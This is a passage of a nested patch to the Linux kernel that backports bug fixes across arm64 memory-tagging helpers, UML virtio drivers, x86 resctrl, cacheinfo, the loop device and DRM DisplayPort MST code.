++extern raw_spinlock_t efi_rt_lock;
+ extern u64 *efi_rt_stack_top;
+ efi_status_t __efi_rt_asm_wrapper(void *, const char *, ...);
+ 
+diff --git a/arch/arm64/include/asm/mte.h b/arch/arm64/include/asm/mte.h
+index 760c62f8e22f8..3f8199ba265a1 100644
+--- a/arch/arm64/include/asm/mte.h
++++ b/arch/arm64/include/asm/mte.h
+@@ -37,6 +37,29 @@ void mte_free_tag_storage(char *storage);
+ /* track which pages have valid allocation tags */
+ #define PG_mte_tagged	PG_arch_2
+ 
++static inline void set_page_mte_tagged(struct page *page)
++{
++	/*
++	 * Ensure that the tags written prior to this function are visible
++	 * before the page flags update.
++	 */
++	smp_wmb();
++	set_bit(PG_mte_tagged, &page->flags);
++}
++
++static inline bool page_mte_tagged(struct page *page)
++{
++	bool ret = test_bit(PG_mte_tagged, &page->flags);
++
++	/*
++	 * If the page is tagged, ensure ordering with a likely subsequent
++	 * read of the tags.
++	 */
++	if (ret)
++		smp_rmb();
++	return ret;
++}
++
+ void mte_zero_clear_page_tags(void *addr);
+ void mte_sync_tags(pte_t old_pte, pte_t pte);
+ void mte_copy_page_tags(void *kto, const void *kfrom);
+@@ -56,6 +79,13 @@ size_t mte_probe_user_range(const char __user *uaddr, size_t size);
+ /* unused if !CONFIG_ARM64_MTE, silence the compiler */
+ #define PG_mte_tagged	0
+ 
++static inline void set_page_mte_tagged(struct page *page)
++{
++}
++static inline bool page_mte_tagged(struct page *page)
++{
++	return false;
++}
+ static inline void mte_zero_clear_page_tags(void *addr)
+ {
+ }
+diff --git a/arch/arm64/include/asm/pgtable.h b/arch/arm64/include/asm/pgtable.h
+index f1cfc44ef52fe..5d0f1f7b76004 100644
+--- a/arch/arm64/include/asm/pgtable.h
++++ b/arch/arm64/include/asm/pgtable.h
+@@ -1050,7 +1050,7 @@ static inline void arch_swap_invalidate_area(int type)
+ static inline void arch_swap_restore(swp_entry_t entry, struct folio *folio)
+ {
+ 	if (system_supports_mte() && mte_restore_tags(entry, &folio->page))
+-		set_bit(PG_mte_tagged, &folio->flags);
++		set_page_mte_tagged(&folio->page);
+ }
+ 
+ #endif /* CONFIG_ARM64_MTE */
+diff --git a/arch/arm64/kernel/cpufeature.c b/arch/arm64/kernel/cpufeature.c
+index 86b2f7ec6c67e..b3eb53847c96b 100644
+--- a/arch/arm64/kernel/cpufeature.c
++++ b/arch/arm64/kernel/cpufeature.c
+@@ -2074,8 +2074,10 @@ static void cpu_enable_mte(struct arm64_cpu_capabilities const *cap)
+ 	 * Clear the tags in the zero page. This needs to be done via the
+ 	 * linear map which has the Tagged attribute.
+ 	 */
+-	if (!test_and_set_bit(PG_mte_tagged, &ZERO_PAGE(0)->flags))
++	if (!page_mte_tagged(ZERO_PAGE(0))) {
+ 		mte_clear_page_tags(lm_alias(empty_zero_page));
++		set_page_mte_tagged(ZERO_PAGE(0));
++	}
+ 
+ 	kasan_init_hw_tags_cpu();
+ }
+diff --git a/arch/arm64/kernel/efi.c b/arch/arm64/kernel/efi.c
+index b273900f45668..a30dbe4b95cd3 100644
+--- a/arch/arm64/kernel/efi.c
++++ b/arch/arm64/kernel/efi.c
+@@ -146,7 +146,7 @@ asmlinkage efi_status_t efi_handle_corrupted_x18(efi_status_t s, const char *f)
+ 	return s;
+ }
+ 
+-DEFINE_SPINLOCK(efi_rt_lock);
++DEFINE_RAW_SPINLOCK(efi_rt_lock);
+ 
+ asmlinkage u64 *efi_rt_stack_top __ro_after_init;
+ 
+diff --git a/arch/arm64/kernel/elfcore.c b/arch/arm64/kernel/elfcore.c
+index 662a61e5e75e4..2e94d20c4ac7a 100644
+--- a/arch/arm64/kernel/elfcore.c
++++ b/arch/arm64/kernel/elfcore.c
+@@ -46,7 +46,7 @@ static int mte_dump_tag_range(struct coredump_params *cprm,
+ 		 * Pages mapped in user space as !pte_access_permitted() (e.g.
+ 		 * PROT_EXEC only) may not have the PG_mte_tagged flag set.
+ 		 */
+-		if (!test_bit(PG_mte_tagged, &page->flags)) {
++		if (!page_mte_tagged(page)) {
+ 			put_page(page);
+ 			dump_skip(cprm, MTE_PAGE_TAG_STORAGE);
+ 			continue;
+diff --git a/arch/arm64/kernel/hibernate.c b/arch/arm64/kernel/hibernate.c
+index af5df48ba915b..788597a6b6a2f 100644
+--- a/arch/arm64/kernel/hibernate.c
++++ b/arch/arm64/kernel/hibernate.c
+@@ -271,7 +271,7 @@ static int swsusp_mte_save_tags(void)
+ 			if (!page)
+ 				continue;
+ 
+-			if (!test_bit(PG_mte_tagged, &page->flags))
++			if (!page_mte_tagged(page))
+ 				continue;
+ 
+ 			ret = save_tags(page, pfn);
+diff --git a/arch/arm64/kernel/mte.c b/arch/arm64/kernel/mte.c
+index 7467217c1eaf3..84a085d536f84 100644
+--- a/arch/arm64/kernel/mte.c
++++ b/arch/arm64/kernel/mte.c
+@@ -41,8 +41,10 @@ static void mte_sync_page_tags(struct page *page, pte_t old_pte,
+ 	if (check_swap && is_swap_pte(old_pte)) {
+ 		swp_entry_t entry = pte_to_swp_entry(old_pte);
+ 
+-		if (!non_swap_entry(entry) && mte_restore_tags(entry, page))
++		if (!non_swap_entry(entry) && mte_restore_tags(entry, page)) {
++			set_page_mte_tagged(page);
+ 			return;
++		}
+ 	}
+ 
+ 	if (!pte_is_tagged)
+@@ -52,8 +54,10 @@ static void mte_sync_page_tags(struct page *page, pte_t old_pte,
+ 	 * Test PG_mte_tagged again in case it was racing with another
+ 	 * set_pte_at().
+ 	 */
+-	if (!test_and_set_bit(PG_mte_tagged, &page->flags))
++	if (!page_mte_tagged(page)) {
+ 		mte_clear_page_tags(page_address(page));
++		set_page_mte_tagged(page);
++	}
+ }
+ 
+ void mte_sync_tags(pte_t old_pte, pte_t pte)
+@@ -69,9 +73,11 @@ void mte_sync_tags(pte_t old_pte, pte_t pte)
+ 
+ 	/* if PG_mte_tagged is set, tags have already been initialised */
+ 	for (i = 0; i < nr_pages; i++, page++) {
+-		if (!test_bit(PG_mte_tagged, &page->flags))
++		if (!page_mte_tagged(page)) {
+ 			mte_sync_page_tags(page, old_pte, check_swap,
+ 					   pte_is_tagged);
++			set_page_mte_tagged(page);
++		}
+ 	}
+ 
+ 	/* ensure the tags are visible before the PTE is set */
+@@ -96,8 +102,7 @@ int memcmp_pages(struct page *page1, struct page *page2)
+ 	 * pages is tagged, set_pte_at() may zero or change the tags of the
+ 	 * other page via mte_sync_tags().
+ 	 */
+-	if (test_bit(PG_mte_tagged, &page1->flags) ||
+-	    test_bit(PG_mte_tagged, &page2->flags))
++	if (page_mte_tagged(page1) || page_mte_tagged(page2))
+ 		return addr1 != addr2;
+ 
+ 	return ret;
+@@ -454,7 +459,7 @@ static int __access_remote_tags(struct mm_struct *mm, unsigned long addr,
+ 			put_page(page);
+ 			break;
+ 		}
+-		WARN_ON_ONCE(!test_bit(PG_mte_tagged, &page->flags));
++		WARN_ON_ONCE(!page_mte_tagged(page));
+ 
+ 		/* limit access to the end of the page */
+ 		offset = offset_in_page(addr);
+diff --git a/arch/arm64/kvm/guest.c b/arch/arm64/kvm/guest.c
+index 2ff13a3f84796..817fdd1ab7783 100644
+--- a/arch/arm64/kvm/guest.c
++++ b/arch/arm64/kvm/guest.c
+@@ -1059,7 +1059,7 @@ long kvm_vm_ioctl_mte_copy_tags(struct kvm *kvm,
+ 		maddr = page_address(page);
+ 
+ 		if (!write) {
+-			if (test_bit(PG_mte_tagged, &page->flags))
++			if (page_mte_tagged(page))
+ 				num_tags = mte_copy_tags_to_user(tags, maddr,
+ 							MTE_GRANULES_PER_PAGE);
+ 			else
+@@ -1076,7 +1076,7 @@ long kvm_vm_ioctl_mte_copy_tags(struct kvm *kvm,
+ 			 * completed fully
+ 			 */
+ 			if (num_tags == MTE_GRANULES_PER_PAGE)
+-				set_bit(PG_mte_tagged, &page->flags);
++				set_page_mte_tagged(page);
+ 
+ 			kvm_release_pfn_dirty(pfn);
+ 		}
+diff --git a/arch/arm64/kvm/mmu.c b/arch/arm64/kvm/mmu.c
+index 60ee3d9f01f8c..2c3759f1f2c56 100644
+--- a/arch/arm64/kvm/mmu.c
++++ b/arch/arm64/kvm/mmu.c
+@@ -1110,9 +1110,9 @@ static int sanitise_mte_tags(struct kvm *kvm, kvm_pfn_t pfn,
+ 		return -EFAULT;
+ 
+ 	for (i = 0; i < nr_pages; i++, page++) {
+-		if (!test_bit(PG_mte_tagged, &page->flags)) {
++		if (!page_mte_tagged(page)) {
+ 			mte_clear_page_tags(page_address(page));
+-			set_bit(PG_mte_tagged, &page->flags);
++			set_page_mte_tagged(page);
+ 		}
+ 	}
+ 
+diff --git a/arch/arm64/mm/copypage.c b/arch/arm64/mm/copypage.c
+index 24913271e898c..6dbc822332f2a 100644
+--- a/arch/arm64/mm/copypage.c
++++ b/arch/arm64/mm/copypage.c
+@@ -21,9 +21,11 @@ void copy_highpage(struct page *to, struct page *from)
+ 
+ 	copy_page(kto, kfrom);
+ 
+-	if (system_supports_mte() && test_bit(PG_mte_tagged, &from->flags)) {
+-		set_bit(PG_mte_tagged, &to->flags);
++	if (system_supports_mte() && page_mte_tagged(from)) {
++		if (kasan_hw_tags_enabled())
++			page_kasan_tag_reset(to);
+ 		mte_copy_page_tags(kto, kfrom);
++		set_page_mte_tagged(to);
+ 	}
+ }
+ EXPORT_SYMBOL(copy_highpage);
+diff --git a/arch/arm64/mm/fault.c b/arch/arm64/mm/fault.c
+index 3eb2825d08cff..4ee20280133e4 100644
+--- a/arch/arm64/mm/fault.c
++++ b/arch/arm64/mm/fault.c
+@@ -944,5 +944,5 @@ struct page *alloc_zeroed_user_highpage_movable(struct vm_area_struct *vma,
+ void tag_clear_highpage(struct page *page)
+ {
+ 	mte_zero_clear_page_tags(page_address(page));
+-	set_bit(PG_mte_tagged, &page->flags);
++	set_page_mte_tagged(page);
+ }
+diff --git a/arch/arm64/mm/mteswap.c b/arch/arm64/mm/mteswap.c
+index bed803d8e1585..70f913205db99 100644
+--- a/arch/arm64/mm/mteswap.c
++++ b/arch/arm64/mm/mteswap.c
+@@ -24,7 +24,7 @@ int mte_save_tags(struct page *page)
+ {
+ 	void *tag_storage, *ret;
+ 
+-	if (!test_bit(PG_mte_tagged, &page->flags))
++	if (!page_mte_tagged(page))
+ 		return 0;
+ 
+ 	tag_storage = mte_allocate_tag_storage();
+diff --git a/arch/um/drivers/vector_kern.c b/arch/um/drivers/vector_kern.c
+index ded7c47d2fbe5..131b7cb295767 100644
+--- a/arch/um/drivers/vector_kern.c
++++ b/arch/um/drivers/vector_kern.c
+@@ -767,6 +767,7 @@ static int vector_config(char *str, char **error_out)
+ 
+ 	if (parsed == NULL) {
+ 		*error_out = "vector_config failed to parse parameters";
++		kfree(params);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/arch/um/drivers/virt-pci.c b/arch/um/drivers/virt-pci.c
+index 3ac220dafec4a..5472b1a0a0398 100644
+--- a/arch/um/drivers/virt-pci.c
++++ b/arch/um/drivers/virt-pci.c
+@@ -132,8 +132,11 @@ static int um_pci_send_cmd(struct um_pci_device *dev,
+ 				out ? 1 : 0,
+ 				posted ? cmd : HANDLE_NO_FREE(cmd),
+ 				GFP_ATOMIC);
+-	if (ret)
++	if (ret) {
++		if (posted)
++			kfree(cmd);
+ 		goto out;
++	}
+ 
+ 	if (posted) {
+ 		virtqueue_kick(dev->cmd_vq);
+@@ -623,22 +626,33 @@ static void um_pci_virtio_remove(struct virtio_device *vdev)
+ 	struct um_pci_device *dev = vdev->priv;
+ 	int i;
+ 
+-        /* Stop all virtqueues */
+-        virtio_reset_device(vdev);
+-        vdev->config->del_vqs(vdev);
+-
+ 	device_set_wakeup_enable(&vdev->dev, false);
+ 
+ 	mutex_lock(&um_pci_mtx);
+ 	for (i = 0; i < MAX_DEVICES; i++) {
+ 		if (um_pci_devices[i].dev != dev)
+ 			continue;
++
+ 		um_pci_devices[i].dev = NULL;
+ 		irq_free_desc(dev->irq);
++
++		break;
+ 	}
+ 	mutex_unlock(&um_pci_mtx);
+ 
+-	um_pci_rescan();
++	if (i < MAX_DEVICES) {
++		struct pci_dev *pci_dev;
++
++		pci_dev = pci_get_slot(bridge->bus, i);
++		if (pci_dev)
++			pci_stop_and_remove_bus_device_locked(pci_dev);
++	}
++
++	/* Stop all virtqueues */
++	virtio_reset_device(vdev);
++	dev->cmd_vq = NULL;
++	dev->irq_vq = NULL;
++	vdev->config->del_vqs(vdev);
+ 
+ 	kfree(dev);
+ }
+diff --git a/arch/um/drivers/virtio_uml.c b/arch/um/drivers/virtio_uml.c
+index 588930a0ced17..ddd080f6dd82e 100644
+--- a/arch/um/drivers/virtio_uml.c
++++ b/arch/um/drivers/virtio_uml.c
+@@ -168,7 +168,8 @@ static void vhost_user_check_reset(struct virtio_uml_device *vu_dev,
+ 	if (!vu_dev->registered)
+ 		return;
+ 
+-	virtio_break_device(&vu_dev->vdev);
++	vu_dev->registered = 0;
++
+ 	schedule_work(&pdata->conn_broken_wk);
+ }
+ 
+@@ -1136,6 +1137,15 @@ void virtio_uml_set_no_vq_suspend(struct virtio_device *vdev,
+ 
+ static void vu_of_conn_broken(struct work_struct *wk)
+ {
++	struct virtio_uml_platform_data *pdata;
++	struct virtio_uml_device *vu_dev;
++
++	pdata = container_of(wk, struct virtio_uml_platform_data, conn_broken_wk);
++
++	vu_dev = platform_get_drvdata(pdata->pdev);
++
++	virtio_break_device(&vu_dev->vdev);
++
+ 	/*
+ 	 * We can't remove the device from the devicetree so the only thing we
+ 	 * can do is warn.
+@@ -1266,8 +1276,14 @@ static int vu_unregister_cmdline_device(struct device *dev, void *data)
+ static void vu_conn_broken(struct work_struct *wk)
+ {
+ 	struct virtio_uml_platform_data *pdata;
++	struct virtio_uml_device *vu_dev;
+ 
+ 	pdata = container_of(wk, struct virtio_uml_platform_data, conn_broken_wk);
++
++	vu_dev = platform_get_drvdata(pdata->pdev);
++
++	virtio_break_device(&vu_dev->vdev);
++
+ 	vu_unregister_cmdline_device(&pdata->pdev->dev, NULL);
+ }
+ 
+diff --git a/arch/x86/include/asm/resctrl.h b/arch/x86/include/asm/resctrl.h
+index d24b04ebf950e..a4641d68eaba1 100644
+--- a/arch/x86/include/asm/resctrl.h
++++ b/arch/x86/include/asm/resctrl.h
+@@ -51,7 +51,7 @@ DECLARE_STATIC_KEY_FALSE(rdt_mon_enable_key);
+  *   simple as possible.
+  * Must be called with preemption disabled.
+  */
+-static void __resctrl_sched_in(void)
++static inline void __resctrl_sched_in(struct task_struct *tsk)
+ {
+ 	struct resctrl_pqr_state *state = this_cpu_ptr(&pqr_state);
+ 	u32 closid = state->default_closid;
+@@ -63,13 +63,13 @@ static void __resctrl_sched_in(void)
+ 	 * Else use the closid/rmid assigned to this cpu.
+ 	 */
+ 	if (static_branch_likely(&rdt_alloc_enable_key)) {
+-		tmp = READ_ONCE(current->closid);
++		tmp = READ_ONCE(tsk->closid);
+ 		if (tmp)
+ 			closid = tmp;
+ 	}
+ 
+ 	if (static_branch_likely(&rdt_mon_enable_key)) {
+-		tmp = READ_ONCE(current->rmid);
++		tmp = READ_ONCE(tsk->rmid);
+ 		if (tmp)
+ 			rmid = tmp;
+ 	}
+@@ -90,17 +90,17 @@ static inline unsigned int resctrl_arch_round_mon_val(unsigned int val)
+ 	return val * scale;
+ }
+ 
+-static inline void resctrl_sched_in(void)
++static inline void resctrl_sched_in(struct task_struct *tsk)
+ {
+ 	if (static_branch_likely(&rdt_enable_key))
+-		__resctrl_sched_in();
++		__resctrl_sched_in(tsk);
+ }
+ 
+ void resctrl_cpu_detect(struct cpuinfo_x86 *c);
+ 
+ #else
+ 
+-static inline void resctrl_sched_in(void) {}
++static inline void resctrl_sched_in(struct task_struct *tsk) {}
+ static inline void resctrl_cpu_detect(struct cpuinfo_x86 *c) {}
+ 
+ #endif /* CONFIG_X86_CPU_RESCTRL */
+diff --git a/arch/x86/kernel/cpu/resctrl/rdtgroup.c b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+index 5993da21d8225..87b670d540b84 100644
+--- a/arch/x86/kernel/cpu/resctrl/rdtgroup.c
++++ b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+@@ -314,7 +314,7 @@ static void update_cpu_closid_rmid(void *info)
+ 	 * executing task might have its own closid selected. Just reuse
+ 	 * the context switch code.
+ 	 */
+-	resctrl_sched_in();
++	resctrl_sched_in(current);
+ }
+ 
+ /*
+@@ -535,7 +535,7 @@ static void _update_task_closid_rmid(void *task)
+ 	 * Otherwise, the MSR is updated when the task is scheduled in.
+ 	 */
+ 	if (task == current)
+-		resctrl_sched_in();
++		resctrl_sched_in(task);
+ }
+ 
+ static void update_task_closid_rmid(struct task_struct *t)
+diff --git a/arch/x86/kernel/process_32.c b/arch/x86/kernel/process_32.c
+index 2f314b170c9f0..ceab14b6118f7 100644
+--- a/arch/x86/kernel/process_32.c
++++ b/arch/x86/kernel/process_32.c
+@@ -212,7 +212,7 @@ __switch_to(struct task_struct *prev_p, struct task_struct *next_p)
+ 	switch_fpu_finish();
+ 
+ 	/* Load the Intel cache allocation PQR MSR. */
+-	resctrl_sched_in();
++	resctrl_sched_in(next_p);
+ 
+ 	return prev_p;
+ }
+diff --git a/arch/x86/kernel/process_64.c b/arch/x86/kernel/process_64.c
+index 6b3418bff3261..7f94dbbc397b7 100644
+--- a/arch/x86/kernel/process_64.c
++++ b/arch/x86/kernel/process_64.c
+@@ -656,7 +656,7 @@ __switch_to(struct task_struct *prev_p, struct task_struct *next_p)
+ 	}
+ 
+ 	/* Load the Intel cache allocation PQR MSR. */
+-	resctrl_sched_in();
++	resctrl_sched_in(next_p);
+ 
+ 	return prev_p;
+ }
+diff --git a/arch/x86/um/vdso/um_vdso.c b/arch/x86/um/vdso/um_vdso.c
+index 2112b8d146688..ff0f3b4b6c45e 100644
+--- a/arch/x86/um/vdso/um_vdso.c
++++ b/arch/x86/um/vdso/um_vdso.c
+@@ -17,8 +17,10 @@ int __vdso_clock_gettime(clockid_t clock, struct __kernel_old_timespec *ts)
+ {
+ 	long ret;
+ 
+-	asm("syscall" : "=a" (ret) :
+-		"0" (__NR_clock_gettime), "D" (clock), "S" (ts) : "memory");
++	asm("syscall"
++		: "=a" (ret)
++		: "0" (__NR_clock_gettime), "D" (clock), "S" (ts)
++		: "rcx", "r11", "memory");
+ 
+ 	return ret;
+ }
+@@ -29,8 +31,10 @@ int __vdso_gettimeofday(struct __kernel_old_timeval *tv, struct timezone *tz)
+ {
+ 	long ret;
+ 
+-	asm("syscall" : "=a" (ret) :
+-		"0" (__NR_gettimeofday), "D" (tv), "S" (tz) : "memory");
++	asm("syscall"
++		: "=a" (ret)
++		: "0" (__NR_gettimeofday), "D" (tv), "S" (tz)
++		: "rcx", "r11", "memory");
+ 
+ 	return ret;
+ }
+diff --git a/drivers/acpi/device_pm.c b/drivers/acpi/device_pm.c
+index 97450f4003cc9..f007116a84276 100644
+--- a/drivers/acpi/device_pm.c
++++ b/drivers/acpi/device_pm.c
+@@ -484,6 +484,25 @@ void acpi_dev_power_up_children_with_adr(struct acpi_device *adev)
+ 	acpi_dev_for_each_child(adev, acpi_power_up_if_adr_present, NULL);
+ }
+ 
++/**
++ * acpi_dev_power_state_for_wake - Deepest power state for wakeup signaling
++ * @adev: ACPI companion of the target device.
++ *
++ * Evaluate _S0W for @adev and return the value produced by it or return
++ * ACPI_STATE_UNKNOWN on errors (including _S0W not present).
++ */
++u8 acpi_dev_power_state_for_wake(struct acpi_device *adev)
++{
++	unsigned long long state;
++	acpi_status status;
++
++	status = acpi_evaluate_integer(adev->handle, "_S0W", NULL, &state);
++	if (ACPI_FAILURE(status))
++		return ACPI_STATE_UNKNOWN;
++
++	return state;
++}
++
+ #ifdef CONFIG_PM
+ static DEFINE_MUTEX(acpi_pm_notifier_lock);
+ static DEFINE_MUTEX(acpi_pm_notifier_install_lock);
+diff --git a/drivers/auxdisplay/hd44780.c b/drivers/auxdisplay/hd44780.c
+index 8b2a0eb3f32a4..d56a5d508ccd7 100644
+--- a/drivers/auxdisplay/hd44780.c
++++ b/drivers/auxdisplay/hd44780.c
+@@ -322,8 +322,10 @@ fail1:
+ static int hd44780_remove(struct platform_device *pdev)
+ {
+ 	struct charlcd *lcd = platform_get_drvdata(pdev);
++	struct hd44780_common *hdc = lcd->drvdata;
+ 
+ 	charlcd_unregister(lcd);
++	kfree(hdc->hd44780);
+ 	kfree(lcd->drvdata);
+ 
+ 	kfree(lcd);
+diff --git a/drivers/base/cacheinfo.c b/drivers/base/cacheinfo.c
+index 4b5cd08c5a657..f30256a524be6 100644
+--- a/drivers/base/cacheinfo.c
++++ b/drivers/base/cacheinfo.c
+@@ -251,7 +251,7 @@ static int cache_shared_cpu_map_setup(unsigned int cpu)
+ {
+ 	struct cpu_cacheinfo *this_cpu_ci = get_cpu_cacheinfo(cpu);
+ 	struct cacheinfo *this_leaf, *sib_leaf;
+-	unsigned int index;
++	unsigned int index, sib_index;
+ 	int ret = 0;
+ 
+ 	if (this_cpu_ci->cpu_map_populated)
+@@ -279,11 +279,13 @@ static int cache_shared_cpu_map_setup(unsigned int cpu)
+ 
+ 			if (i == cpu || !sib_cpu_ci->info_list)
+ 				continue;/* skip if itself or no cacheinfo */
+-
+-			sib_leaf = per_cpu_cacheinfo_idx(i, index);
+-			if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
+-				cpumask_set_cpu(cpu, &sib_leaf->shared_cpu_map);
+-				cpumask_set_cpu(i, &this_leaf->shared_cpu_map);
++			for (sib_index = 0; sib_index < cache_leaves(i); sib_index++) {
++				sib_leaf = per_cpu_cacheinfo_idx(i, sib_index);
++				if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
++					cpumask_set_cpu(cpu, &sib_leaf->shared_cpu_map);
++					cpumask_set_cpu(i, &this_leaf->shared_cpu_map);
++					break;
++				}
+ 			}
+ 		}
+ 		/* record the maximum cache line size */
+@@ -297,7 +299,7 @@ static int cache_shared_cpu_map_setup(unsigned int cpu)
+ static void cache_shared_cpu_map_remove(unsigned int cpu)
+ {
+ 	struct cacheinfo *this_leaf, *sib_leaf;
+-	unsigned int sibling, index;
++	unsigned int sibling, index, sib_index;
+ 
+ 	for (index = 0; index < cache_leaves(cpu); index++) {
+ 		this_leaf = per_cpu_cacheinfo_idx(cpu, index);
+@@ -308,9 +310,14 @@ static void cache_shared_cpu_map_remove(unsigned int cpu)
+ 			if (sibling == cpu || !sib_cpu_ci->info_list)
+ 				continue;/* skip if itself or no cacheinfo */
+ 
+-			sib_leaf = per_cpu_cacheinfo_idx(sibling, index);
+-			cpumask_clear_cpu(cpu, &sib_leaf->shared_cpu_map);
+-			cpumask_clear_cpu(sibling, &this_leaf->shared_cpu_map);
++			for (sib_index = 0; sib_index < cache_leaves(sibling); sib_index++) {
++				sib_leaf = per_cpu_cacheinfo_idx(sibling, sib_index);
++				if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
++					cpumask_clear_cpu(cpu, &sib_leaf->shared_cpu_map);
++					cpumask_clear_cpu(sibling, &this_leaf->shared_cpu_map);
++					break;
++				}
++			}
+ 		}
+ 		if (of_have_populated_dt())
+ 			of_node_put(this_leaf->fw_token);
+diff --git a/drivers/base/component.c b/drivers/base/component.c
+index 5eadeac6c5322..7dbf14a1d9157 100644
+--- a/drivers/base/component.c
++++ b/drivers/base/component.c
+@@ -125,7 +125,7 @@ static void component_debugfs_add(struct aggregate_device *m)
+ 
+ static void component_debugfs_del(struct aggregate_device *m)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(m->parent), component_debugfs_dir));
++	debugfs_lookup_and_remove(dev_name(m->parent), component_debugfs_dir);
+ }
+ 
+ #else
+diff --git a/drivers/base/dd.c b/drivers/base/dd.c
+index 9ae2b5c4fc496..c463173f1fb1a 100644
+--- a/drivers/base/dd.c
++++ b/drivers/base/dd.c
+@@ -372,7 +372,7 @@ late_initcall(deferred_probe_initcall);
+ 
+ static void __exit deferred_probe_exit(void)
+ {
+-	debugfs_remove_recursive(debugfs_lookup("devices_deferred", NULL));
++	debugfs_lookup_and_remove("devices_deferred", NULL);
+ }
+ __exitcall(deferred_probe_exit);
+ 
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index df628e30bca41..981464e561df1 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -977,13 +977,13 @@ loop_set_status_from_info(struct loop_device *lo,
+ 		return -EINVAL;
+ 	}
+ 
++	/* Avoid assigning overflow values */
++	if (info->lo_offset > LLONG_MAX || info->lo_sizelimit > LLONG_MAX)
++		return -EOVERFLOW;
++
+ 	lo->lo_offset = info->lo_offset;
+ 	lo->lo_sizelimit = info->lo_sizelimit;
+ 
+-	/* loff_t vars have been assigned __u64 */
+-	if (lo->lo_offset < 0 || lo->lo_sizelimit < 0)
+-		return -EOVERFLOW;
+-
+ 	memcpy(lo->lo_file_name, info->lo_file_name, LO_NAME_SIZE);
+ 	lo->lo_file_name[LO_NAME_SIZE-1] = 0;
+ 	lo->lo_flags = info->lo_flags;
+diff --git a/drivers/bus/mhi/ep/main.c b/drivers/bus/mhi/ep/main.c
+index 9c42886818418..357c61c12ce5b 100644
+--- a/drivers/bus/mhi/ep/main.c
++++ b/drivers/bus/mhi/ep/main.c
+@@ -219,7 +219,7 @@ static int mhi_ep_process_cmd_ring(struct mhi_ep_ring *ring, struct mhi_ring_ele
+ 		mutex_unlock(&mhi_chan->lock);
+ 		break;
+ 	case MHI_PKT_TYPE_RESET_CHAN_CMD:
+-		dev_dbg(dev, "Received STOP command for channel (%u)\n", ch_id);
++		dev_dbg(dev, "Received RESET command for channel (%u)\n", ch_id);
+ 		if (!ch_ring->started) {
+ 			dev_err(dev, "Channel (%u) not opened\n", ch_id);
+ 			return -ENODEV;
+diff --git a/drivers/firmware/efi/sysfb_efi.c b/drivers/firmware/efi/sysfb_efi.c
+index 7882d4b3f2be4..f06fdacc9bc83 100644
+--- a/drivers/firmware/efi/sysfb_efi.c
++++ b/drivers/firmware/efi/sysfb_efi.c
+@@ -264,6 +264,14 @@ static const struct dmi_system_id efifb_dmi_swap_width_height[] __initconst = {
+ 					"Lenovo ideapad D330-10IGM"),
+ 		},
+ 	},
++	{
++		/* Lenovo IdeaPad Duet 3 10IGL5 with 1200x1920 portrait screen */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_VERSION,
++					"IdeaPad Duet 3 10IGL5"),
++		},
++	},
+ 	{},
+ };
+ 
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index 4ca37261584a9..e77c674b37ca2 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -3309,8 +3309,13 @@ int drm_dp_add_payload_part1(struct drm_dp_mst_topology_mgr *mgr,
+ 	int ret;
+ 
+ 	port = drm_dp_mst_topology_get_port_validated(mgr, payload->port);
+-	if (!port)
++	if (!port) {
++		drm_dbg_kms(mgr->dev,
++			    "VCPI %d for port %p not in topology, not creating a payload\n",
++			    payload->vcpi, payload->port);
++		payload->vc_start_slot = -1;
+ 		return 0;
++	}
+ 
+ 	if (mgr->payload_count == 0)
+ 		mgr->next_start_slot = mst_state->start_slot;
+@@ -3644,6 +3649,9 @@ int drm_dp_mst_topology_mgr_set_mst(struct drm_dp_mst_topology_mgr *mgr, bool ms
+ 		drm_dp_dpcd_writeb(mgr->aux, DP_MSTM_CTRL, 0);
+ 		ret = 0;
+ 		mgr->payload_id_table_cleared = false;
++
++		memset(&mgr->down_rep_recv, 0, sizeof(mgr->down_rep_recv));
++		memset(&mgr->up_req_recv, 0, sizeof(mgr->up_req_recv));
+ 	}
+ 
+ out_unlock:
+@@ -3856,7 +3864,7 @@ static int drm_dp_mst_handle_down_rep(struct drm_dp_mst_topology_mgr *mgr)
+ 	struct drm_dp_sideband_msg_rx *msg = &mgr->down_rep_recv;
+ 
+ 	if (!drm_dp_get_one_sb_msg(mgr, false, &mstb))
+-		goto out;
++		goto out_clear_reply;
+ 
+ 	/* Multi-packet message transmission, don't clear the reply */
+ 	if (!msg->have_eomt)
+@@ -5354,28 +5362,53 @@ struct drm_dp_mst_topology_state *drm_atomic_get_mst_topology_state(struct drm_a
+ }
+ EXPORT_SYMBOL(drm_atomic_get_mst_topology_state);
+ 
++/**
++ * drm_atomic_get_old_mst_topology_state: get old MST topology state in atomic state, if any
++ * @state: global atomic state
++ * @mgr: MST topology manager, also the private object in this case
++ *
++ * This function wraps drm_atomic_get_old_private_obj_state() passing in the MST atomic
++ * state vtable so that the private object state returned is that of a MST
++ * topology object.
++ *
++ * Returns:
++ *
++ * The old MST topology state, or NULL if there's no topology state for this MST mgr
++ * in the global atomic state
++ */
++struct drm_dp_mst_topology_state *
++drm_atomic_get_old_mst_topology_state(struct drm_atomic_state *state,
++				      struct drm_dp_mst_topology_mgr *mgr)
++{
++	struct drm_private_state *old_priv_state =
++		drm_atomic_get_old_private_obj_state(state, &mgr->base);
++
++	return old_priv_state ? to_dp_mst_topology_state(old_priv_state) : NULL;
++}
++EXPORT_SYMBOL(drm_atomic_get_old_mst_topology_state);
++
+ /**
+  * drm_atomic_get_new_mst_topology_state: get new MST topology state in atomic state, if any
+  * @state: global atomic state
+  * @mgr: MST topology manager, also the private object in this case
+  *
+- * This function wraps drm_atomic_get_priv_obj_state() passing in the MST atomic
++ * This function wraps drm_atomic_get_new_private_obj_state() passing in the MST atomic
+  * state vtable so that the private object state returned is that of a MST
+  * topology object.
+  *
+  * Returns:
+  *
